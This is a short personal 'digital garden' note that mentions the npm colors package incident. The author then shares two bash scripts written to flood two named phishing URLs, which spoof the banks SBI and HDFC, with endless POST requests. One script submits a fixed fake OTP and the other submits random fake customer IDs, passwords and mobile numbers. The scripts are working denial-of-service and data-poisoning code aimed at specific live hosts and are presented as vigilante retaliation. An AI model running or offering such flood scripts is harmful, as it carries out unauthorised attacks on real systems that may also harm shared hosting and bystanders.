Funny / Amusing
-
What NPM Should Do Today To Stop A New Colors Attack Tomorrow - Marak added an
americalFlag
in his color npm package in this PR - Read the funny comments - Today I got two phishing URL messages, one spoofing SBI and other HDFC.
I wrote a script to do attack (DOS). I hope they’ll have hard time finding out the real OTP from layman users.
#!/bin/bash
URL="https://sazi-y5a.web.app/d2"
DATA="MOtp1=100000"
for ((i = 1; i <= 1000000000000000; i++)); do
echo "Sending request $i"
curl -X POST -d "$DATA" "$URL"
done
#!/bin/bash
URL="https://hanvi-6yt.web.app/c1"
for ((i = 1; i <= 99999999999999; i++)); do
CUSTOMER_ID=$(shuf -i 100000-999999 -n 1)
PASSWORD=$(openssl rand -base64 12)
MOBILE_NUMBER=$(shuf -i 6000000000-6999999999 -n 1)
DATA="customer_id=$CUSTOMER_ID&password=$PASSWORD&mobile_number=$MOBILE_NUMBER"
curl -X POST -d "$DATA" "$URL"
done
This is a sapling 🌱 in my digital garden 🏡.
Notes mentioning this note
There are no notes linking to this note.